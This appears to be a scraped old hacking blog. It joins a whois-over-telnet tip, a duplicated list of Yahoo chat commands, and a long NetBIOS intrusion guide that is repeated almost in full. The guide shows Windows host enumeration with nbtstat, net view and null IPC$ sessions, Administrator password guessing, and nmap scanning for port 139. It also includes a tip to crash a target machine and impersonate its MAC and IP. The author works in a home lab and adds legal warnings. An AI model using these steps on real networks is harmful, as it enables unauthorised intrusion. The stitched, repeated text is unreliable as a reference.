Network solutions shut down that nifty telnet thing on whois.intenic.net on the default telnet port (25), despite many protests. However, there is something fun you can do with telnet with whois.internic.net or any other cooperating domain name server. At your DOS prompt in Windows (search for command.com or cmd.exe to run a DOS prompt) or teminal prompt (shell) in Linux or Unix, type:
telnet whois.internic.net 43
It gives a blank page. Type in the domain name you want to check and hit enter. Voila! You get something like this:
Whois Server Version 1.3
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net for detailed information.
Domain Name: TECHBROKER.COM
Registrar: NETWORK SOLUTIONS, INC.
Whois Server: whois.networksolutions.com
Referral URL: http://www.networksolutions.com
Name Server: DNS1.WURLD.NET
Name Server: DNS2.WURLD.NET
Status: ACTIVE
Updated Date: 11-dec-2002
Creation Date: 13-feb-1996
Expiration Date: 14-feb-2006
>>> Last update of whois database: Fri, 14 Nov 2003 07:28:09 EST <<<
NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration.
Wednesday, July 29, 2009
Yahoo Chat Commands how to
Yahoo Chat Commands:
/join [room] go to what ever room you wish
/invite [buddys name] sends invitation request
/tell [user] [message] private messages a friend
/follow [user] follows a friend
/stopfollow [user] stop following someone
/stopfollow [yourname] to stop them from following you
/goto [user] enters the room the user is in
/away [off] turn your private messages back on
/think [message] (type this to think what you want
/ignore [list] list everyone who you are ignoring
/ignore add [user] add someone to your ignoring list
/ignore [add all] ignores everything going on
/join [room] go to what ever room you wish
/invite [buddys name] sends invitation request
/tell [user] [message] private messages a friend
/follow [user] follows a friend
/stopfollow [user] stop following someone
/stopfollow [yourname] to stop them from following you
/goto [user] enters the room the user is in
/away [off] turn your private messages back on
/think [message] (type this to think what you want
/ignore [list] list everyone who you are ignoring
/ignore add [user] add someone to your ignoring list
/ignore [add all] ignores everything going on
NetBios explained
The Magic of NetBIOS
In this guide you will learn how to explore the Internet using Windows XP and NetBIOS:
• How to Install NetBIOS
• How to Use Nbtstat
• The Net View Command
• What to Do Once You Are Connected
• How to Break in Using the XP GUI
• More on the Net Commands
• How Crackers Break in as Administrator
• How to Scan for Computers that Use NetBIOS
• How to Play NetBIOS Wargames
• An Evil Genius Tip for Win NT Server Users
• Help for Windows 95, 98, SE and ME Users
Not many computers are reachable over the Internet using NetBIOS commands - maybe only a few million. But what the heck, a few million is enough to keep a hacker from getting bored. And if you know what to look for, you will discover that there are a lot of very busy hackers and Internet worms searching for computers they can break into by using NetBIOS commands. By learning the dangers of NetBIOS, you can get an appreciation for why it is a really, truly BAD!!! idea to use it.
*****************
Newbie note: a worm is a program that reproduces itself. For example, Code Red automatically searched over the Internet for vulnerable Windows computers and broke into them. So if you see an attempt to break into your computer, it may be either a human or a worm.
*****************
If you run an intrusion detection system (IDS) on your computer, you are certain to get a lot of alerts of NetBIOS attacks. Here's an example:
The firewall has blocked Internet access to your computer (NetBIOS Session) from 10.0.0.2 (TCP Port 1032) [TCP Flags: S].
Occurred: 2 times between 10/29/2002 7:38:20 AM and 10/29/2002 7:46:18 AM
A Windows NT server on my home network, which has addresses that all start with 10.0.0, caused these alerts. In this case the server was just doing its innocent thing, looking for other Windows computers on my LAN (local area network) that might need to network with it. Every now and then, however, an attacker might pretend to have an address from your internal network even though it is attacking from outside.
If a computer from out on the Internet tries to open a NetBIOS session with one of mine, I'll be mighty suspicious. Here's one example of what an outside attack may look like:
The firewall has blocked Internet access to your computer (NetBIOS Name) from 999.209.116.123 (UDP Port 1028).
Time: 10/30/2002 11:10:02 AM
(The attacker's IP address has been altered to protect the innocent or the guilty, as the case may be.)
Want to see how intensely crackers and worms are scanning the Internet for potential NetBIOS targets? A really great and free IDS for Windows that is also a firewall is Zone Alarm. You can download it for free from http://www.zonelabs.com . You can set it to pop up a warning on your screen whenever someone or some worm attacks your computer. You will almost certainly get a NetBIOS attack the first day you use your IDS.
Do you need to worry when a NetBIOS attack hits? Only if you have enabled NetBIOS and Shares on your computer. Unfortunately, in order to explore other computers using NetBIOS, you increase the danger to your own computer from attack by NetBIOS. But, hey, to paraphrase a famous carpenter from Galilee, he who lives by the NetBIOS gets hacked by the NetBIOS.
********************
Newbie note: NetBEUI (NetBIOS Extended User Interface) is an out-of-date, crummy, not terribly secure way for Windows computers to communicate with each other in a peer-to-peer mode. NetBIOS stands for network basic input/output system.
Newbie note: Shares are when you make it so other computers can access files and directories on your computer. If you set up your computer to use NetBIOS, in Win XP using the NTFS (new technology file system) you can share files and directories by bringing up My Computer. Click on a directory - which in XP is called a "folder". In the left-hand column a task will appear called "Share this folder". By clicking this you can set who can access this folder, how many people at a time can access it, and what they can do with the folder.
********************
There are a number of network exploration commands that only NetBIOS uses. We will show how to use nbtstat and several versions of the net command.
How to Install NetBIOS
You might have to make changes on your system in order to use these commands. Here's how to enable NetBIOS for Windows XP. (If you are stuck with Windows 95, 98, SE or ME, see the end of this Guide for how to enable NetBIOS.) Click:
Control Panel -> Network Connections
There are two types of network connections that may appear here: "Dial-up" and "LAN or High-Speed Internet".
**************
Newbie note: A dial-up connection uses a modem to reach the Internet. LAN stands for local area network. It's what you have if two or more computers are linked to each other with a cable instead of modems. Most schools and businesses have LANs, as well as homes with Internet connection sharing. A DSL or cable modem connection will also typically show up as a LAN connection.
**************
To configure your connections for hacking, double click on the connection you plan to use. That brings up a box that has a button labeled "Properties". Clicking it brings up a box that says "This connection uses the following items:"
You need to have both TCP/IP and NWLink NetBIOS showing. If NWLink NetBIOS is missing, here's how to add it. Click Install -> Protocol -> Add NWlink/IPX/SPX/NetBIOS Compatible Transport Protocol.
**************
Newbie note: NWLink refers to Novell's Netware protocol for running a LAN.
**************
How to Use Nbtstat
To get started, bring up the cmd.exe command. Click Start -> Run and type cmd.exe in the command line box. This brings up a black screen with white letters. Once it is up, we will play with the nbtstat command. To get help for this command, just type:
C:\>nbtstat help
One way to use the nbtstat command is to try to get information from another computer using either its domain name (for example test.target.com), its numerical Internet address (for example, happyhacker.org's numerical address is 206.61.52.30), or its NetBIOS name (if you are on the same LAN).
C:\>nbtstat -a 10.0.0.2
Local Area Connection:
Node IpAddress: [10.0.0.1] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
OLDGUY <00> UNIQUE Registered
OLDGUY <20> UNIQUE Registered
WARGAME <00> GROUP Registered
INet~Services <1C> GROUP Registered
IS~OLDGUY......<00> UNIQUE Registered
OLDGUY <03> UNIQUE Registered
WARGAME <1E> GROUP Registered
ADMINISTRATOR <03> UNIQUE Registered
MAC Address = 52-54-00-E4-6F-40
What do these things tell us about this computer? Following is a table explaining the codes you may see with an nbtstat command (taken from the MH Desk Reference, written by the Rhino9 team).
Name Number Type Usage =========================================================
00 U Workstation Service
01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCPIP Service
52 U DEC Pathworks TCPIP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Apps
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server
To keep this Guide from being ridiculously long, we'll just explain a few of the things what we learned when we ran nbtstat -a against 10.0.0.2:
* it uses NetBIOS
* its NetBIOS name is Oldguy
* one of the users is named Administrator
* it runs a web site with Internet Information Server, and maybe an ftp - file transfer protocol -- server
* it is a member of the domain Wargame
* it is connected on a local area network and we accessed it through an Ethernet network interface card (NIC) with a MAC Address of 52-54-00-E4-6F-40.
When using nbtstat over the Internet, in most cases it will not find the correct MAC address. However, sometimes you get lucky. That is part of the thrill of legal hacker exploration. OK, OK, maybe getting a thrill out of a MAC address means I'm some kind of a freak. But if you are reading this, you probably are freaky enough to be a hacker, too.
**************
Newbie note: MAC stands for media access control. In theory every NIC ever made has a unique MAC address, one that no other NIC has. In practice, however, some manufacturers make NICs that allow you to change the MAC address.
**************
**************
Evil Genius tip: sneak your computer onto a LAN and use it to find the MAC address of a very interesting computer. Crash it, then give yours the same MAC, NetBIOS name and Internet address as the very interesting computer. Then see what you can do while faking being that computer. That's why I get a charge out of discovering a MAC address, so stop laughing at me already.
**************
**************
You can get fired, expelled, busted and catch cooties warning: Faking all that stuff is something you would be better off doing only on your own test network, or with written permission from the owner of the very interesting computer.
**************
Now that we know some basic things about computer 10.0.0.2, also known as Oldguy, we can do some simple things to learn more. We can connect to it with a web browser to see what's on the web site, and with ftp to see if it allows anonymous users to download or upload files. In the case of Oldguy, anyone can browse the web site. However, when we try to connect to its ftp server with Netscape by giving the location ftp://10.0.0.2, it returns the message "User Mozilla@ cannot log in.
**************
Newbie note: The people who programmed Netscape have always called it Mozilla, after a famous old movie monster. As a joke they have stuck obscure mentions of Mozilla into the operations of Netscape. Mozilla lovers recently spun off a pure Mozilla browser project that has the web site http://www.mozilla.org.
**************
The Net View Command
Now let's have some serious fun. Netscape (or any browser or ftp program) uses TCP/IP to connect. What happens if we use NetBIOS instead to try to download files from Oldguy's ftp server?
Let's try some more NetBIOS commands:
C:\>net view \\10.0.0.2
System error 53 has occurred.
The network path was not found.
I got this message because my firewall blocked access to Oldguy, giving the message:
The firewall has blocked Internet access to 10.0.0.2 (TCP Port 445) from your computer [TCP Flags: S].
There's a good reason for this. My firewall/IDS is trying to keep me from carelessly making my computer a part of some stranger's LAN. Keep in mind that NetBIOS is a two-way street. However, I want to run this command, so I shut down Zone Alarm and give the command again:
C:\>net view \\10.0.0.2
Shared resources at \\10.0.0.2
Share name Type Used as Comment
--------------------------------------------------------
ftproot Disk
InetPub Disk
wwwroot Disk
The command completed successfully.
This is a list of shared directories. Oooh, look at that, the ftp server is shared. Does this mean I can get in? When setting shares on a Windows NT server, the default choice is to allow access to read, write and delete files to everyone. So sometimes a sysadmin carelessly fails to restrict access to a share.
What is really important is that we didn't need a user name or password to get this potentially compromising information.
Let's establish an anonymous connection to Oldguy, meaning we connect without giving it a user name or password:
C:\>net use \\10.0.0.2\ipc$
Local name
Remote name \\10.0.0.2\IPC$
Resource type IPC
Status OK
# Opens 0
# Connections 1
The command completed successfully.
We are connected!
**********************
Newbie note: IPC (ipc$) stands for "Inter Process Connector", used to set up connections across a network between Windows computers using NetBIOS.
**********************
What to Do Once you Are Connected
So far we haven't quite been breaking the law, although we have been getting pretty rude if the owner of that target computer hasn't given us permission to explore. What if we want to stop pushing our luck and decide to disconnect? Just give the message:
C:\>net session \\10.0.0.2 /delete
Of course you would substitute the name or number of the computer to which you are connected for 10.0.0.2.
What if you want to stay connected? Oldguy will let you stay connected even if you do nothing more. By contrast, a login to a Unix/Linux type computer will normally time out and disconnect you if you go too long without doing anything.
How to Break in Using the XP GUI
You could try out the other net commands on Oldguy. Or you can go to the graphical user interface (GUI) of XP. After running the above commands I click My Computer, then My Network Places and there you'll find the victim, er, I mean, target computer. By clicking on it, I discover that ftproot has been shared to - everyone!
Let's say you were to get this far investigating some random computer you found on the Internet. Let's say you had already determined that the ftp server isn't open to the public. At this moment you would have a little angel sitting one shoulder whispering "You can be a hero. Email the owner of that computer to tell him or her about that misconfigured ftproot."
On the other shoulder a little devil is sneering, "Show the luser no mercy. Information should be free. Because I said so, that's why. Hot darn, are those spreadsheets from the accounting department? You could make a lot of bucks selling those files to a competitor, muhahaha! Besides, you're so ugly that future cellmate Spike won't make you be his girlfriend."
Some hackers might think that because ftproot is shared to the world that it is OK to download stuff from it. However, if someone were to log in properly to that ftp server, he or she would get the message "Welcome to Oldguy on Carolyn Meinel's LAN. Use is restricted to only those for whom Meinel has assigned a user name and password." This warning logon banner is all a computer owner needs to legally establish that no one is allowed to just break in. It won't impress a judge if a cracker says "The owner was so lame that her computer deserved to get broken into" or "I'm so lame that I forgot to try to use the ftp server the normal way."
More on the Net Commands
Let's get back to the net commands. There are many forms of this command. In XP you can learn about them with the command:
C:\>net help
The syntax of this command is:
NET HELP
command
-or-
NET command /HELP
Commands available are:
• NET ACCOUNTS
• NET HELP
• NET SHARE
NET COMPUTER
• NET HELPMSG
• NET START
• NET CONFIG
• NET LOCALGROUP
• NET STATISTICS
• NET CONFIG SERVER
• NET NAME
• NET STOP
• NET CONFIG WORKSTATION
• NET PAUSE
• NET TIME
• NET CONTINUE
• NET PRINT
• NET USE
• NET FILE
• NET SEND
• NET USER
• NET GROUP
• NET SESSION
• NET VIEW
• NET HELP SERVICES lists some of the services you can start.
• NET HELP SYNTAX explains how to read NET HELP syntax lines.
• NET HELP command | MORE displays Help one screen at a time.
How Crackers Break in as Administrator
As we look around Oldguy further, we see that there's not much else an anonymous user can do to it. We know that there is a user named Administrator. What can we do if we can convince Oldguy that we are Administrator?
******************
Newbie note: in Windows NT, 2000 and XP, the Administrator user has total power over its computer, just as root has total power over a Unix/Linux type computer. However, it is possible to change the name of Administrator so an attacker has to guess which user has all the power.
******************
Let's try to log in as Administrator by guessing the password. Give the command:
C:\>net use \\10.0.0.2\ipc$ * /user:Administrator
Type the password for \\10.0.0.2\ipc$:
System error 1219 has occurred.
Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.
This means that someone else is currently logged onto this server who has Administrator rights. Furthermore, this person is probably watching me on an IDS and thinking up terrible things to do to me. Eeep! Actually this is all going on inside my hacker lab - but you get the idea of what it could be like when trying to invade a computer without permission.
I discover that whether I guess the password correctly or not, I always get the same error message. This is a good safety feature. On the other hand, one of the users is named Administrator. This is a bad thing for the defender. When you first set up a Windows NT or 2000 server, there is always a user called Administrator, and he or she has total power over that computer. If you know the all-powerful user is named Administrator, you can try guessing the password whenever no one is logged on with Administrator powers.
Computer criminals don't waste time guessing by hand. They use a program such as NAT or Legion to get passwords. These programs are why smart NT administrators rename their Administrator accounts and choose hard passwords. Also, this kind of persistent attack will be detected by an intrusion detection system, making it easy to catch criminals at work.
********************
You can get expelled warning: What if you are a student and you want to save your school from malicious code kiddies who steal tests and change grades? It is important to get permission *in writing* before you test the school's network. Even then, you still must be careful to be a model student. If you act up, cut classes - you know what I mean - the first time a cracker messes up the network, who do you think they will suspect? Yes, it's unfair, and yes, that is the way the world works.
********************
How to Scan for Computers that Use NetBIOS
Your tool of choice is a port scanner. Any computer that is running something on port 139 is likely (but not certain) to be using NetBIOS. Most crackers use nmap to port scan. This tool runs on Unix/Linux type computers. You can get it at
Here's an example of an nmap scan of Oldguy:
test-box:/home/cmeinel # nmap -sTU 10.0.0.2
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (10.0.0.2):
(The 3060 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
70/tcp open gopher
80/tcp open http
135/tcp open loc-srv
135/udp open loc-srv
137/udp open netbios-ns
138/udp open netbios-dgm
139/tcp open netbios-ssn
500/udp open isakmp
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
As you can see from this scan, three ports are identified with NetBIOS. This tells us that we could set nmap to scan a large number of Internet addresses, only looking for port 139 on each. To learn how to set up nmap to run this way, in your Unix or Linux shell give the command "man nmap".
For more on what crackers do once they break into a computer using NetBIOS (like installing back doors), see http://happyhacker.org/gtmhh/vol3no10.shtml.
********************
You can get punched in the nose warning: if you use a port scanner against networks that haven't given you permission to scan, you will be waving a red flag that says "Whaddaya wanna bet I'm a computer criminal?" You can't get arrested for merely port scanning, but people who don't like being scanned might get you kicked off your Internet service provider.
You can get really, big time, punched in the nose warning: If you visit the same computer or LAN really often to see what's new and to try different things, even if you don't break the law you'd better be doing it with the permission of the owner. Otherwise you may make enemies who might crash or destroy your operating system. And that is only what they may do when feeling mellow. After a night of hard drinking - well, you don't want to find out.
********************
How to Play NetBIOS Wargames
What if you want to challenge your friends to a hacker wargame using NetBIOS? The first thing to do is *don't* email me asking me to break in for you. Sheesh. Seriously, almost every day I get emails from people claiming to have permission from their girlfriend/boyfriend and begging me to help them break in. You can read their hilarious pleas for help at http://happyhacker.org/sucks/ <../sucks/index.shtml> .
The way to run a hacker wargame over the Internet is first, get permission from your Internet provider so they don't kick you off for hacking. They probably run an IDS that scans users for suspicious activity. They probably hate malicious hackers. Enough said.
Second, you and your friends are likely to be at a different Internet address every time you log on. Your safest way to play over the Internet is for each player to get an Internet address that is the same every time he or she logs on: a "static" address. This way you won't accidentally break into someone else's computer.
You have to arrange with your Internet provider to get a static address. Normally only a local provider can do this for you. A big advantage of using a local provider is you can make friends with the people who work there - and they are probably hackers.
If you live in an apartment building or dormitory with other hackers, you can play break-in games without using the Internet. Set up a LAN where you can play together. For example, you can string Ethernet cable from window to window. To learn how to set up a Windows Ethernet LAN, see http://happyhacker.org/gtmhh/winlan.shtml .
Or you could set up a wireless LAN. With wireless you never know who might come cruising with a laptop down the street by your home or business and break in. That can make a wargame lots more fun. For help on how to break into wireless LANs (it's pathetically easy), see
**************
Evil genius tip: Attack using a Win NT server with the Microsoft Resource Kit installed. Heh, heh. With it you can give the command:
C:\>Local Administrators \\
This should show all user accounts with administrator rights on targetbox.com.
C:\>Global Administrators \\
This should show all user accounts with Domain administrative rights. These are exceptionally worth compromising, because with one Domain administrative password you will be able to control many resources among NT servers, workstations, and Win 95/98 computers.
I've tried to install the Resource Kit on XP Professional, but it wasn't compatible.
Another option is to install hacker tools such as Red Button and DumpACL, which extract information on user names, hashes, and which services are running on a given machine.
**************
Help for users of Windows 95, 98, SE or ME
To enable NetBIOS, click
Control Panel -> Network -> Protocols
If you see both NetBEUI and TCP/IP, you are already using NetBIOS. If not, add NetBEUI.
To bring up the command screen, click Start -> Run and type in command.com.
In this guide you will learn how to explore the Internet using Windows XP and NetBIOS:
• How to Install NetBIOS
• How to Use Nbtstat
• The Net View Command
• What to Do Once You Are Connected
• How to Break in Using the XP GUI
• More on the Net Commands
• How Crackers Break in as Administrator
• How to Scan for Computers that Use NetBIOS
• How to Play NetBIOS Wargames
• An Evil Genius Tip for Win NT Server Users
• Help for Windows 95, 98, SE and ME Users
Not many computers are reachable over the Internet using NetBIOS commands - maybe only a few million. But what the heck, a few million is enough to keep a hacker from getting bored. And if you know what to look for, you will discover that there are a lot of very busy hackers and Internet worms searching for computers they can break into by using NetBIOS commands. By learning the dangers of NetBIOS, you can get an appreciation for why it is a really, truly BAD!!! idea to use it.
*****************
Newbie note: a worm is a program that reproduces itself. For example, Code Red automatically searched over the Internet for vulnerable Windows computers and broke into them. So if you see an attempt to break into your computer, it may be either a human or a worm.
*****************
If you run an intrusion detection system (IDS) on your computer, you are certain to get a lot of alerts of NetBIOS attacks. Here's an example:
The firewall has blocked Internet access to your computer (NetBIOS Session) from 10.0.0.2 (TCP Port 1032) [TCP Flags: S].
Occurred: 2 times between 10/29/2002 7:38:20 AM and 10/29/2002 7:46:18 AM
A Windows NT server on my home network, which has addresses that all start with 10.0.0, caused these alerts. In this case the server was just doing its innocent thing, looking for other Windows computers on my LAN (local area network) that might need to network with it. Every now and then, however, an attacker might pretend to have an address from your internal network even though it is attacking from outside.
If a computer from out on the Internet tries to open a NetBIOS session with one of mine, I'll be mighty suspicious. Here's one example of what an outside attack may look like:
The firewall has blocked Internet access to your computer (NetBIOS Name) from 999.209.116.123 (UDP Port 1028).
Time: 10/30/2002 11:10:02 AM
(The attacker's IP address has been altered to protect the innocent or the guilty, as the case may be.)
Want to see how intensely crackers and worms are scanning the Internet for potential NetBIOS targets? A really great and free IDS for Windows that is also a firewall is Zone Alarm. You can download it for free from http://www.zonelabs.com . You can set it to pop up a warning on your screen whenever someone or some worm attacks your computer. You will almost certainly get a NetBIOS attack the first day you use your IDS.
Do you need to worry when a NetBIOS attack hits? Only if you have enabled NetBIOS and Shares on your computer. Unfortunately, in order to explore other computers using NetBIOS, you increase the danger to your own computer from attack by NetBIOS. But, hey, to paraphrase a famous carpenter from Galilee, he who lives by the NetBIOS gets hacked by the NetBIOS.
********************
Newbie note: NetBEUI (NetBIOS Extended User Interface) is an out-of-date, crummy, not terribly secure way for Windows computers to communicate with each other in a peer-to-peer mode. NetBIOS stands for network basic input/output system.
Newbie note: Shares are when you make it so other computers can access files and directories on your computer. If you set up your computer to use NetBIOS, in Win XP using the NTFS (new technology file system) you can share files and directories by bringing up My Computer. Click on a directory - which in XP is called a "folder". In the left-hand column a task will appear called "Share this folder". By clicking this you can set who can access this folder, how many people at a time can access it, and what they can do with the folder.
********************
There are a number of network exploration commands that only NetBIOS uses. We will show how to use nbtstat and several versions of the net command.
How to Install NetBIOS
You might have to make changes on your system in order to use these commands. Here's how to enable NetBIOS for Windows XP. (If you are stuck with Windows 95, 98, SE or ME, see the end of this Guide for how to enable NetBIOS.) Click:
Control Panel -> Network Connections
There are two types of network connections that may appear here: "Dial-up" and "LAN or High-Speed Internet".
**************
Newbie note: A dial-up connection uses a modem to reach the Internet. LAN stands for local area network. It's what you have if two or more computers are linked to each other with a cable instead of modems. Most schools and businesses have LANs, as well as homes with Internet connection sharing. A DSL or cable modem connection will also typically show up as a LAN connection.
**************
To configure your connections for hacking, double click on the connection you plan to use. That brings up a box that has a button labeled "Properties". Clicking it brings up a box that says "This connection uses the following items:"
You need to have both TCP/IP and NWLink NetBIOS showing. If NWLink NetBIOS is missing, here's how to add it. Click Install -> Protocol -> Add NWlink/IPX/SPX/NetBIOS Compatible Transport Protocol.
**************
Newbie note: NWLink refers to Novell's Netware protocol for running a LAN.
**************
How to Use Nbtstat
To get started, bring up the cmd.exe command. Click Start -> Run and type cmd.exe in the command line box. This brings up a black screen with white letters. Once it is up, we will play with the nbtstat command. To get help for this command, just type:
C:\>nbtstat help
One way to use the nbtstat command is to try to get information from another computer using either its domain name (for example test.target.com), its numerical Internet address (for example, happyhacker.org's numerical address is 206.61.52.30), or its NetBIOS name (if you are on the same LAN).
C:\>nbtstat -a 10.0.0.2
Local Area Connection:
Node IpAddress: [10.0.0.1] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
OLDGUY <00> UNIQUE Registered
OLDGUY <20> UNIQUE Registered
WARGAME <00> GROUP Registered
INet~Services <1C> GROUP Registered
IS~OLDGUY......<00> UNIQUE Registered
OLDGUY <03> UNIQUE Registered
WARGAME <1E> GROUP Registered
ADMINISTRATOR <03> UNIQUE Registered
MAC Address = 52-54-00-E4-6F-40
What do these things tell us about this computer? Following is a table explaining the codes you may see with an nbtstat command (taken from the MH Desk Reference, written by the Rhino9 team).
Name Number Type Usage =========================================================
<\\_MSBROWSE_> 01 G Master Browser
To keep this Guide from being ridiculously long, we'll just explain a few of the things what we learned when we ran nbtstat -a against 10.0.0.2:
* it uses NetBIOS
* its NetBIOS name is Oldguy
* one of the users is named Administrator
* it runs a web site with Internet Information Server, and maybe an ftp - file transfer protocol -- server
* it is a member of the domain Wargame
* it is connected on a local area network and we accessed it through an Ethernet network interface card (NIC) with a MAC Address of 52-54-00-E4-6F-40.
When using nbtstat over the Internet, in most cases it will not find the correct MAC address. However, sometimes you get lucky. That is part of the thrill of legal hacker exploration. OK, OK, maybe getting a thrill out of a MAC address means I'm some kind of a freak. But if you are reading this, you probably are freaky enough to be a hacker, too.
**************
Newbie note: MAC stands for media access control. In theory every NIC ever made has a unique MAC address, one that no other NIC has. In practice, however, some manufacturers make NICs that allow you to change the MAC address.
**************
**************
Evil Genius tip: sneak your computer onto a LAN and use it to find the MAC address of a very interesting computer. Crash it, then give yours the same MAC, NetBIOS name and Internet address as the very interesting computer. Then see what you can do while faking being that computer. That's why I get a charge out of discovering a MAC address, so stop laughing at me already.
**************
**************
You can get fired, expelled, busted and catch cooties warning: Faking all that stuff is something you would be better off doing only on your own test network, or with written permission from the owner of the very interesting computer.
**************
Now that we know some basic things about computer 10.0.0.2, also known as Oldguy, we can do some simple things to learn more. We can connect to it with a web browser to see what's on the web site, and with ftp to see if it allows anonymous users to download or upload files. In the case of Oldguy, anyone can browse the web site. However, when we try to connect to its ftp server with Netscape by giving the location ftp://10.0.0.2, it returns the message "User Mozilla@ cannot log in.
**************
Newbie note: The people who programmed Netscape have always called it Mozilla, after a famous old movie monster. As a joke they have stuck obscure mentions of Mozilla into the operations of Netscape. Mozilla lovers recently spun off a pure Mozilla browser project that has the web site http://www.mozilla.org.
**************
The Net View Command
Now let's have some serious fun. Netscape (or any browser or ftp program) uses TCP/IP to connect. What happens if we use NetBIOS instead to try to download files from Oldguy's ftp server?
Let's try some more NetBIOS commands:
C:\>net view \\10.0.0.2
System error 53 has occurred.
The network path was not found.
I got this message because my firewall blocked access to Oldguy, giving the message:
The firewall has blocked Internet access to 10.0.0.2 (TCP Port 445) from your computer [TCP Flags: S].
There's a good reason for this. My firewall/IDS is trying to keep me from carelessly making my computer a part of some stranger's LAN. Keep in mind that NetBIOS is a two-way street. However, I want to run this command, so I shut down Zone Alarm and give the command again:
C:\>net view \\10.0.0.2
Shared resources at \\10.0.0.2
Share name Type Used as Comment
--------------------------------------------------------
ftproot Disk
InetPub Disk
wwwroot Disk
The command completed successfully.
This is a list of shared directories. Oooh, look at that, the ftp server is shared. Does this mean I can get in? When setting shares on a Windows NT server, the default choice is to allow access to read, write and delete files to everyone. So sometimes a sysadmin carelessly fails to restrict access to a share.
What is really important is that we didn't need a user name or password to get this potentially compromising information.
Let's establish an anonymous connection to Oldguy, meaning we connect without giving it a user name or password:
C:\>net use \\10.0.0.2\ipc$
Local name
Remote name \\10.0.0.2\IPC$
Resource type IPC
Status OK
# Opens 0
# Connections 1
The command completed successfully.
We are connected!
**********************
Newbie note: IPC (ipc$) stands for "Inter Process Connector", used to set up connections across a network between Windows computers using NetBIOS.
**********************
What to Do Once you Are Connected
So far we haven't quite been breaking the law, although we have been getting pretty rude if the owner of that target computer hasn't given us permission to explore. What if we want to stop pushing our luck and decide to disconnect? Just give the message:
C:\>net session \\10.0.0.2 /delete
Of course you would substitute the name or number of the computer to which you are connected for 10.0.0.2.
What if you want to stay connected? Oldguy will let you stay connected even if you do nothing more. By contrast, a login to a Unix/Linux type computer will normally time out and disconnect you if you go too long without doing anything.
How to Break in Using the XP GUI
You could try out the other net commands on Oldguy. Or you can go to the graphical user interface (GUI) of XP. After running the above commands I click My Computer, then My Network Places and there you'll find the victim, er, I mean, target computer. By clicking on it, I discover that ftproot has been shared to - everyone!
Let's say you were to get this far investigating some random computer you found on the Internet. Let's say you had already determined that the ftp server isn't open to the public. At this moment you would have a little angel sitting one shoulder whispering "You can be a hero. Email the owner of that computer to tell him or her about that misconfigured ftproot."
On the other shoulder a little devil is sneering, "Show the luser no mercy. Information should be free. Because I said so, that's why. Hot darn, are those spreadsheets from the accounting department? You could make a lot of bucks selling those files to a competitor, muhahaha! Besides, you're so ugly that future cellmate Spike won't make you be his girlfriend."
Some hackers might think that because ftproot is shared to the world that it is OK to download stuff from it. However, if someone were to log in properly to that ftp server, he or she would get the message "Welcome to Oldguy on Carolyn Meinel's LAN. Use is restricted to only those for whom Meinel has assigned a user name and password." This warning logon banner is all a computer owner needs to legally establish that no one is allowed to just break in. It won't impress a judge if a cracker says "The owner was so lame that her computer deserved to get broken into" or "I'm so lame that I forgot to try to use the ftp server the normal way."
More on the Net Commands
Let's get back to the net commands. There are many forms of this command. In XP you can learn about them with the command:
C:\>net help
The syntax of this command is:
NET HELP
command
-or-
NET command /HELP
Commands available are:
• NET ACCOUNTS
• NET HELP
• NET SHARE
NET COMPUTER
• NET HELPMSG
• NET START
• NET CONFIG
• NET LOCALGROUP
• NET STATISTICS
• NET CONFIG SERVER
• NET NAME
• NET STOP
• NET CONFIG WORKSTATION
• NET PAUSE
• NET TIME
• NET CONTINUE
• NET PRINT
• NET USE
• NET FILE
• NET SEND
• NET USER
• NET GROUP
• NET SESSION
• NET VIEW
• NET HELP SERVICES lists some of the services you can start.
• NET HELP SYNTAX explains how to read NET HELP syntax lines.
• NET HELP command | MORE displays Help one screen at a time.
How Crackers Break in as Administrator
As we look around Oldguy further, we see that there's not much else an anonymous user can do to it. We know that there is a user named Administrator. What can we do if we can convince Oldguy that we are Administrator?
******************
Newbie note: in Windows NT, 2000 and XP, the Administrator user has total power over its computer, just as root has total power over a Unix/Linux type computer. However, it is possible to change the name of Administrator so an attacker has to guess which user has all the power.
******************
Let's try to log in as Administrator by guessing the password. Give the command:
C:\>net use \\10.0.0.2\ipc$ * /user:Administrator
Type the password for \\10.0.0.2\ipc$:
System error 1219 has occurred.
Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.
This means that someone else is currently logged onto this server who has Administrator rights. Furthermore, this person is probably watching me on an IDS and thinking up terrible things to do to me. Eeep! Actually this is all going on inside my hacker lab - but you get the idea of what it could be like when trying to invade a computer without permission.
I discover that whether I guess the password correctly or not, I always get the same error message. This is a good safety feature. On the other hand, one of the users is named Administrator. This is a bad thing for the defender. When you first set up a Windows NT or 2000 server, there is always a user called Administrator, and he or she has total power over that computer. If you know the all-powerful user is named Administrator, you can try guessing the password whenever no one is logged on with Administrator powers.
Computer criminals don't waste time guessing by hand. They use a program such as NAT or Legion to get passwords. These programs are why smart NT administrators rename their Administrator accounts and choose hard passwords. Also, this kind of persistent attack will be detected by an intrusion detection system, making it easy to catch criminals at work.
********************
